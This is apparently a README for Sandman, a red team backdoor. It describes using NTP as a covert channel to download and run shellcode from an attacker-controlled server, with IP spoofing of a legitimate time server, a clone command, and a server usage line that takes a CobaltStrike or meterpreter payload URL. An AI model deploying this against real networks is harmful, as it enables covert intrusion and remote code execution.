Sandman: NTP based backdoor for red team engagements
Sandman is a backdoor that is meant to work on hardened networks during red team engagements.
Sandman works as a stager and leverages NTP (a protocol to sync time & date) to get and run an arbitrary shellcode from a pre defined server.
Since NTP is a protocol that is overlooked by many defenders resulting in wide network accessibility.
Getting and executing an arbitrary payload from an attacker’s controlled server.
Can work on hardened networks since NTP is usually allowed in FW.
Impersonating a legitimate NTP server via IP spoofing.
- Python 3.9
- Requirements are specified in the requirements file.
git clone https://github.com/Idov31/Sandman.git
To compile the backdoor itself I used Visual Studio 2022, but as mentioned in the usage section it can be compiled with both VS2022 and csc.
Run on windows / *nix machine:
python3 sandman_server.py “Network Adapter“ “Payload Url“ “optional: ip to spoof“
Network Adapter: The adapter that you want the server to listen on (for example Ethernet for Windows, eth0 for *nix).
Payload Url: The URL to your shellcode, it could be your agent (for example, CobaltStrike or meterpreter) or another stager.
IP to Spoof: If you want to spoof a legitimate IP address (for example, time.microsoft.com’s ip address). TBA
To start, you can compile the SandmanBackdoor, because it is a single lightweight C# executable you can execute it via ExecuteAssembly, run it as an NTP provider TBA or just execute/inject it.
Copyright (c) 2022, Ido Veltzman